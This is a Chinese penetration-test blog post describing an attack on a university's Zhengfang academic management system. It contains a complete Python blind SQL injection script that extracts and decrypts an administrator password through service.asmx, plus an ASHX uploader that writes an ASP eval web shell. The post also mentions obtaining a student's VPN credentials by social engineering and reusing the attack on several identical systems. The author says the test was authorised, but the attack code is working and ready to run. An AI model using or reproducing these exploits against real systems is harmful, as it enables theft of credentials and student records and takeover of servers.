记某正方系统从注入到Getshell到提权失败

最近一直在忙的项目,单纯记录一下

注:渗透得到授权,关键信息已打码

0x01 社工

社工得到该学校某学生VPN连接账号密码。

0x02 正方SQL注入

存在service.asmx,尝试注入:

import requests
import re
import os
def add(a):
    if a=='~':
        a=None
        return a
    a=chr(ord(a)+1)
    if a=='&' or a=='<':
        a=chr(ord(a)+1)
    return a
def zfDecrypt(pwd,key="Encrypt01"):
    print 'beginning to decrypte password...'
    tmp = ""
    for i in range(len(pwd)//len(key)+1):
        tmp = tmp + key
    key = tmp[0:len(pwd)]
        
    pwdLength = len(pwd)
    
    if (pwdLength % 2 ==0):
        pwd_1 = list(pwd[0:pwdLength//2])
        pwd_2 = list(pwd[pwdLength//2:pwdLength])
        pwd_1.reverse()
        pwd_2.reverse()
        pwd = ''.join(pwd_1)+''.join(pwd_2)
        
    array_p = []
    array_k = []
    
    for i in range(pwdLength):
        
        array_p.append(pwd[i:i+1])
        array_k.append(key[i:i+1])
        a = ord(array_p[i])^ord(array_k[i])
        
        if((a>=32)and(a<=126)):
            array_p[i] = chr(a)
    pwd = ''.join(array_p)
    print 'decryption finished'
    return pwd
def getSession(url):
    s=requests.session()
    r=s.get(url)
    return url+r.request.path_url
def addasmx(url):
    pos=url.rfind('/')
    return url[:pos]+'/service.asmx'
def handle_url(url):
    if url[-1]=='/':
        url=url[:-1]
    s=requests.session()
    r=s.get(url)
    if r.request.path_url!='/':
        pos=r.request.path_url.rfind('/')
        session=r.request.path_url[:pos]
    else:
        session=r.request.path_url
    url=url+session+'/service.asmx'
    r=requests.get(url)
    if r.status_code==200 and 'ERROR' not in r.content:
        return url
    else: 
        return None
def get_headers_body(url,xn,xh):
    regx='<pre>([\s\S]+?)</pre>'
    r=requests.get(url+'?op=zfcwjk1')
    ret=re.findall(regx,r.content)
    pos=ret[0].find('\r\n\r\n')
    headers=ret[0][:pos]
    body=ret[0][pos+4:]
    headers=headers.split('\r\n')[1:]
    headers={i.split(': ')[0]:''.join(i.split(': ')[1:]) for i in headers if 'Content-Length' not in i}
    headers['User-Agent']='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'    
    body=body.replace('&lt;','<')\
             .replace('&gt;','>')\
             .replace('<font class=value>','')\
             .replace('</font>','')
    body=body.replace('>string<','>'+xn+'<',1)\
             .replace('>string<','>'+xh+'\' and (SELECT SUBSTR(TO_CHAR(KL),%s,1) from yhb where yhm=\'jwc01\')=\'%s'+'<',1)\
             .replace('>string<','>'+'\' or \'1\'=\'1'+'<')
    return headers,body

def sqlinject(url,headers,body):
    reg='<zfcwjk1Result xsi:type="xsd:int">(\d)</zfcwjk1Result>'
    password=''
    r=requests.get(url)
    print 'beginning to do sql injection....'
    for i in range(1,20):
        c=' '
        org=len(password)
        while c!=None:
            print 'trying '+str(i)+'th'+':'+c
            data=body%(str(i),c)
            r=requests.post(url,headers=headers,data=data)
            ret=re.findall(reg,r.content)
            if ret==[]:
                continue
            if ret[0]=='3':
                print 'corrent char found:'+c
                password=password+c
                break
            elif ret[0]=='2':
                c=add(c)
            else:
                print ret
                break
        if org==len(password):
            print 'sql injection finished ,encrypted password:'+password+'\n'
            break
    return password


url=raw_input('please input target url:')
xh=raw_input('please input xuehao:')
xn=raw_input('please input xuenian:')
url=handle_url(url)
if url==None:
    print 'cannot access target url'
    print '/service.asmx might be removed or the url is wrong'
    os.system('PAUSE')
    os._exit(0)
headers,body=get_headers_body(url,xn,xh)
encrypt=sqlinject(url,headers,body)
text=zfDecrypt(encrypt)
print 'account:jwc01\npassword:'+text+'\n\n\n'

注意这里要提供一个有效的学号。

得到账号密码以后就可以登陆正方教务系统。

0x03 信息泄露

该系统存在点名册,导致信息泄露。

0x04 Getshell

教务公告处上传,ashx可传,但是直接传马会报错,用下面的小马生成一句话:

<%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; public
class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("a.asp"));
file1.Write("<%eval request(\"a\")%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}}

访问一下生成一句话(/wbwj/xxx.ashx),之后蚁剑连接即可。

有趣的是,该目标存在多个相同系统,一把梭。

0x05 失败的提权

提权是很迷的,只有web根目录有写权限,并且好像size过大就写不进去,无法执行命令。上传的大马也是直接跳转到error页面,考虑是否存在WAF,但是简单的探测也是没有结果。

只能暂时搁置了,原因现在都没整明白。因为测试只有上面贴出的生成一句话的小马是有作用的,其他都会跳转到错误页面。

Leave a Reply

Your email address will not be published. Required fields are marked *

13 + eleven =